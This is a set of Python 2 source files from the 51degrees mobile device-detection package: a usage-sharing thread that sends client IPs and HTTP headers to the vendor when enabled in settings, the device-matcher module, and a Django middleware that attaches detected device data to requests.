cls._instance = cls()
return cls._instance
def record(self, client_ip, http_headers):
'''Adds request details.
Adds some request details to the queue for further submission by
the background thread.
*client_ip* is a string with the client IP address.
*http_headers* is a dictionary containing all HTTP headers.
'''
# Enabled?
if settings.USAGE_SHARER_ENABLED and self._stopping == False:
# Launch background daemon data submission thread if not running.
if not self.is_alive():
self.daemon = True
self.start()
# Add the request details to the queue for further submission.
self._queue.append(self._get_item(client_ip, http_headers))
# Signal the background thread to check if it should send
# queued data.
self._event.set()
def stop(self):
'''Gracefully stops background data submission thread.
'''
if self.is_alive():
settings.logger.info('Stopping 51Degrees UsageSharer.')
self._stopping = True
self._event.set()
self.join()
def run(self):
'''Runs the background daemon data submission thread.
Used to send the devices data back to 51Degrees.mobi after the
minimum queue length has been reached.
'''
# Log.
settings.logger.info('Starting 51Degrees UsageSharer.')
# Submission loop.
while not self._stopping:
# Wait while event's flag is set to True.
while not self._event.is_set():
self._event.wait()
# If there are enough items in the queue, or the thread is being
# stopped, submit the queued data.
length = len(self._queue)
if length >= settings.USAGE_SHARER_MINIMUM_QUEUE_LENGTH or (length > 0 and self._stopping):
self._submit()
# Reset the internal event's flag to False.
self._event.clear()
# Log.
settings.logger.info('Stopped 51Degrees UsageSharer.')
def _is_local(self, address):
return address in settings.USAGE_SHARER_LOCAL_ADDRESSES
def _get_item(self, client_ip, http_headers):
# Create base device element.
device = ET.Element('Device')
# Add the current date and time.
item = ET.SubElement(device, 'DateSent')
item.text = datetime.utcnow().replace(microsecond=0).isoformat()
# Add product name and version.
item = ET.SubElement(device, 'Version')
item.text = settings.VERSION
item = ET.SubElement(device, 'Product')
item.text = 'Python Mobile Detector'
# Add client IP address (if is not local).
if not self._is_local(client_ip):
item = ET.SubElement(device, 'ClientIP')
item.text = client_ip
# Filter & add HTTP headers.
for name, value in http_headers.iteritems():
# Determine if the field should be treated as a blank.
blank = name.upper() in settings.USAGE_SHARER_IGNORED_HEADER_FIELD_VALUES
# Include all header values if maximum detail is enabled, or
# header values related to the user agent or any header
# key containing profile or information helpful to determining
# mobile devices.
if settings.USAGE_SHARER_MAXIMUM_DETAIL or \
name.upper() in ('USER-AGENT', 'HOST', 'PROFILE') or \
blank:
item = ET.SubElement(device, 'Header')
item.set('Name', name)
if not blank:
item.text = unicode(value)
# Done!
return device
def _submit(self):
'''Sends all the data on the queue.
'''
settings.logger.info('Submitting UsageSharer queued data to %s.' % settings.USAGE_SHARER_SUBMISSION_URL)
# Build output stream.
stream = StringIO.StringIO()
gzStream = StringIO.StringIO()
devices = ET.Element('Devices')
while len(self._queue) > 0:
devices.append(self._queue.pop())
ET.ElementTree(devices).write(
stream,
encoding='utf8',
xml_declaration=True)
stream.seek(0,0)
# Gzip the data.
with gzip.GzipFile(fileobj=gzStream, mode='wb') as gzObj:
gzObj.write(stream.read())
gzStream.seek(0,0)
# Submit gzipped data.
request = urllib2.Request(
url=settings.USAGE_SHARER_SUBMISSION_URL,
data=gzStream.read(),
headers={
'Content-Type': 'text/xml; charset=utf-8',
'Content-Encoding': 'gzip',
})
try:
response = urllib2.urlopen(request, timeout=settings.USAGE_SHARER_SUBMISSION_TIMEOUT)
except:
# Turn off functionality.
self._stopping = True
else:
# Get the response and record the content if it's valid. If it's
# not valid consider turning off the functionality.
code = response.getcode()
if code == 200:
# OK. Do nothing.
pass
elif code == 408:
# Request Timeout. Could be temporary, do nothing.
pass
else:
# Turn off functionality.
self._stopping = True | 51degrees-mobile-detector | /51degrees-mobile-detector-3.2.18.4.tar.gz/51degrees-mobile-detector-3.2.18.4/fiftyone_degrees/mobile_detector/usage.py | usage.py |
from __future__ import absolute_import
from abc import ABCMeta
from fiftyone_degrees.mobile_detector.conf import settings
from fiftyone_degrees.mobile_detector import usage
class Device(object):
'''Simple device wrapper.
'''
def __init__(self, method=None):
self._method = method
self._properties = {}
def set_property(self, name, value):
self._properties[name] = value
@property
def method(self):
return self._method
@property
def properties(self):
return self._properties
def __getattr__(self, name):
if name in self._properties:
return self._properties.get(name)
else:
name = name.lower()
for aname, value in self._properties.iteritems():
if name == aname.lower():
return value
return None
def __getstate__(self):
return self.__dict__
def __setstate__(self, d):
self.__dict__.update(d)
class _Matcher(object):
'''Abstract matcher class.
'''
__metaclass__ = ABCMeta
_METHODS = {}
_INSTANCES = {}
@classmethod
def register(cls, method, klass):
cls._METHODS[method] = klass
@classmethod
def instance(cls, method):
if method in cls._METHODS:
if method not in cls._INSTANCES:
cls._INSTANCES[method] = cls._METHODS[method]()
return cls._INSTANCES[method]
else:
raise Exception(
'Requested matching method "%s" does not exist. '
'Available methods are: %s.' %
(method, ', '.join(cls._METHODS.keys()),))
def match(self, user_agent, client_ip=None, http_headers=None):
# If provided, share usage information.
if client_ip and http_headers:
usage.UsageSharer.instance().record(client_ip, http_headers)
# Delegate on specific matcher implementation.
return self._match(user_agent)
def _match(self, user_agent):
raise NotImplementedError('Please implement this method.')
class _V3WrapperMatcher(_Matcher):
ID = 'v3-wrapper'
def __init__(self):
if settings.V3_WRAPPER_DATABASE:
try:
# Does the database file exists and is it readable?
with open(settings.V3_WRAPPER_DATABASE):
pass
except IOError:
raise Exception(
'The provided detection database file (%s) does not '
'exist or is not readable. Please, '
'check your settings.' % settings.V3_WRAPPER_DATABASE)
else:
from FiftyOneDegrees import fiftyone_degrees_mobile_detector_v3_wrapper
self.provider = fiftyone_degrees_mobile_detector_v3_wrapper.Provider(settings.V3_WRAPPER_DATABASE, settings.PROPERTIES, int(settings.CACHE_SIZE), int(settings.POOL_SIZE))
else:
raise Exception(
'Trie-based detection method depends on an external '
'database file. Please, check your settings.')
def _match(self, user_agent):
# Delegate on wrapped implementation.
returnedMatch = None
try:
returnedMatch = self.provider.getMatch(user_agent)
except Exception as e:
settings.logger.error(
'Got exception while matching user agent string "%s": %s.'
% (user_agent, unicode(e),))
# Pythonize result.
result = Device(self.ID)
if returnedMatch:
result.set_property('Id', returnedMatch.getDeviceId())
result.set_property('MatchMethod', returnedMatch.getMethod())
result.set_property('Difference', returnedMatch.getDifference())
result.set_property('Rank', returnedMatch.getRank())
if settings.PROPERTIES == '':
for key in self.provider.getAvailableProperties():
value = returnedMatch.getValues(key)
if value:
result.set_property(key, ' '.join(value))
else:
result.set_property(key, 'N/A in Lite')
else:
for key in settings.PROPERTIES.split(','):
value = returnedMatch.getValues(key)
if value:
result.set_property(key, ' '.join(value))
# Done!
return result
class _V3TrieWrapperMatcher(_Matcher):
ID = 'v3-trie-wrapper'
def __init__(self):
if settings.V3_TRIE_WRAPPER_DATABASE:
try:
# Does the database file exists and is it readable?
with open(settings.V3_TRIE_WRAPPER_DATABASE):
pass
except IOError:
raise Exception(
'The provided detection database file (%s) does not '
'exist or is not readable. Please, '
'check your settings.' % settings.V3_TRIE_WRAPPER_DATABASE)
else:
from FiftyOneDegrees import fiftyone_degrees_mobile_detector_v3_trie_wrapper
self.provider = fiftyone_degrees_mobile_detector_v3_trie_wrapper.Provider(settings.V3_TRIE_WRAPPER_DATABASE, settings.PROPERTIES)
else:
raise Exception(
'Trie-based detection method depends on an external '
'database file. Please, check your settings.')
def _match(self, user_agent):
# Delegate on wrapped implementation.
returnedMatch = None
try:
returnedMatch = self.provider.getMatch(user_agent)
except Exception as e:
settings.logger.error(
'Got exception while matching user agent string "%s": %s.'
% (user_agent, unicode(e),))
# Pythonize result.
result = Device(self.ID)
print settings.PROPERTIES
if returnedMatch:
if settings.PROPERTIES == '':
for key in self.provider.getAvailableProperties():
value = returnedMatch.getValues(key)
if value:
result.set_property(key, ' '.join(value))
else:
result.set_property(key, 'N/A in Lite')
else:
for key in settings.PROPERTIES.split(','):
value = returnedMatch.getValues(key)
if value:
result.set_property(key, ' '.join(value))
# Done!
return result
# Register matching methods.
for klass in [_V3WrapperMatcher, _V3TrieWrapperMatcher]:
_Matcher.register(klass.ID, klass)
def match(user_agent, client_ip=None, http_headers=None, method=None):
'''Fetches device data based on an user agent string.
*user_agent* is an user agent string.
*client_ip* is a string with the client IP address (optional). If provided
it'll will be submitted to 51Degrees.mobi in order to improve performance
and accuracy of further device detections.
*http_headers* is a dictionary containing all HTTP headers (optional).
If provided, it'll will be submitted (removing confidential data such as
cookies) to 51Degrees.mobi in order to improve performance and accuracy
of further device detections.
*method* is a string with the desired device detection method. If not
specified, settings.DETECTION_METHOD will be used.
Returns Device instance.
'''
# Fetch matcher instance.
matcher = _Matcher.instance(
method
if method is not None
else settings.DETECTION_METHOD)
# Match!
return matcher.match(user_agent, client_ip, http_headers) | 51degrees-mobile-detector | /51degrees-mobile-detector-3.2.18.4.tar.gz/51degrees-mobile-detector-3.2.18.4/fiftyone_degrees/mobile_detector/__init__.py | __init__.py |
from __future__ import absolute_import
import string
import logging
import pickle
from django.core.validators import validate_ipv46_address
from django.core.exceptions import ValidationError
from django.conf import settings
from fiftyone_degrees import mobile_detector
try:
from django.utils.deprecation import MiddlewareMixin
except ImportError:
MiddlewareMixin = object
# Settings names.
SESSION_CACHE = 'FIFTYONE_DEGREES_MOBILE_DETECTOR_SESSION_CACHE'
SESSION_FIELD = 'FIFTYONE_DEGREES_MOBILE_DETECTOR_SESSION_FIELD'
# Default settings values.
DEFAULT_SESSION_CACHE = False
DEFAULT_SESSION_FIELD = '_51degrees_device'
class DetectorMiddleware(MiddlewareMixin):
'''Adds lazily generated 'device' attribute to the incoming request.
'''
def process_request(self, request):
request.device = _Device(request)
return None
class _Device(object):
'''Proxies lazily generated 'mobile_detector.Device' instance.
'''
def __init__(self, request):
self._request = request
self._device = None
def __getattr__(self, name):
if self._device is None:
self._device = self._fetch()
return getattr(self._device, name)
def _fetch(self):
# Do *not* break the request when not being able to detect device.
try:
if getattr(settings, SESSION_CACHE, DEFAULT_SESSION_CACHE) and \
hasattr(self._request, 'session'):
field = getattr(settings, SESSION_FIELD, DEFAULT_SESSION_FIELD)
if field not in self._request.session:
device = self._match()
self._request.session[field] = pickle.dumps(device)
else:
device = pickle.loads(self._request.session[field])
else:
device = self._match()
except Exception as e:
logging.\
getLogger('fiftyone_degrees.mobile_detector').\
error('Got an exception while detecting device: %s.' % unicode(e))
device = mobile_detector.Device()
# Done!
return device
def _match(self):
# Fetch client IP address.
client_ip = self._request.META.get('REMOTE_ADDR')
if 'HTTP_X_FORWARDED_FOR' in self._request.META:
# HTTP_X_FORWARDED_FOR can be a comma-separated list of IPs.
# Take just the first valid one (proxies like squid may introduce
# invalid values like 'unknown' under certain configurations, so
# a validations is always required).
for ip in self._request.META['HTTP_X_FORWARDED_FOR'].split(','):
ip = ip.strip()
try:
validate_ipv46_address(ip)
client_ip = ip
break
except ValidationError:
pass
# Fetch HTTP headers.
# See: https://docs.djangoproject.com/en/dev/ref/request-response/#django.http.HttpRequest.META
http_headers = {}
for name, value in self._request.META.iteritems():
if name in ('CONTENT_LENGTH', 'CONTENT_TYPE',):
http_headers[self._normalized_header_name(name)] = value
elif name.startswith('HTTP_'):
http_headers[self._normalized_header_name(name[5:])] = value
# Match.
return mobile_detector.match(http_headers)
def _normalized_header_name(self, value):
value = value.replace('_', ' ')
value = string.capwords(value)
return value.replace(' ', '-') | 51degrees-mobile-detector | /51degrees-mobile-detector-3.2.18.4.tar.gz/51degrees-mobile-detector-3.2.18.4/fiftyone_degrees/mobile_detector/contrib/django/middleware.py | middleware.py |